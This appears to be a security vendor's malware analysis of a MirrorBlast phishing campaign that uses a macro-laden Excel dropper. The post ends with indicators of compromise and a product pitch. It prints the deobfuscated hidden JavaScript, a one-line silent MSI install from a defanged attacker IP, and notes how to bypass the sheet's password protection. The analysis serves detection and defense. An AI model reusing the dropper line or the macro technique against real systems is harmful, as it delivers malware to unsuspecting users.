MirrorBlast malware is a trojan that is known for attacking users’ browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously.  Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.

Just last week, a new MirrorBlast phishing campaign focusing on German-speaking countries was discovered. A malicious Microsoft Excel file named “Bericht(entwurf).xls”, which translates to “Report (draft)”, was found to be used as a dropper of the MirrorBlast trojan. The Excel file requests the user to “Enable Content” which ultimately activates the macro embedded within the file:

Once the content is enabled, an Auto_Open macro is executed. The macro executes a JavaScript stored in the first cell of the sheet:

In the sample above, no anti-sandbox checks were included in the macro, however several sources reported a different script that did contain these checks.

To see the JavaScript hidden in cell A1, a requirement was to move the picture. This wasn’t possible as the sheet was password protected:

This obstacle can be easily bypassed for example, by using the script found here.

Below is the hidden malicious JavaScript:

Once deobfuscated, the JavaScript is: “with(new Activexobject(“”WindowsInstaller.Installer””)){UILevel=2;InstallProduct)””http://5.189.222[.]161″”)}”.  It directly downloads a “load.msi” file from 5.189.222[.]161.

The .msi installs Rebol-View software (a legitimate software) and executes a script encrypted with base64. Here is how it looks after decryption:

Learn more about Minerva Labs’ Anti-Ransomware Platform

 

The script collects data and communicates with the C&C server using the Rebol-View tool.

REBOL is a “multi-paradigm dynamic programming language” that was designed to be used for network communications and distributed computing. It is multi-platform, can run on any operating system (OS), and it introduced the idea of dialecting —small, optimized, domain-specific languages for code and data.

It can be used to program internet applications (client and server-side), database applications, utilities, and multimedia applications.

It is important to mention that REBOL itself is not a malicious program. It has been used for many legitimate operations. Recently this tool was used as a C&C environment in several attacks, more information can be found here.

 

At the time of writing, the malicious excel file had only been found by five AV engines.

Minerva Labs Malicious Document Prevention module prevents the drop of the initial stage installer, stopping the attack at its very first stage, before it causes any damage.

 

To learn more about how we can protect your business:

IOC’s

IP’s:

http://5.189.222[.]161

http://feristoaul[.]com  – C&C server

Hashes:

Bericht(entwurf).xls  – 7904e73defa12c220cdc04d059cfc8acf3ae96dad41c7bb26381f076f17004cf

load.msi – eceb164a69e8f79bb08099fcdf2b75071c527b0107daebc0e7a88e246b4c7f13

exemple.rb – 9c109c41d497cbe752edf56c1ac0e1ffb06357160b12100cc84eb2d4ddcb7b13

rebol-view-278-3-1.exe – 215e28f9660472b6271a9902573c9d190e4d7ccca33fcf8d6054941d52a3ab85

References:

https://easysolvemalware.com/mirrorblast-malware-removal-steps/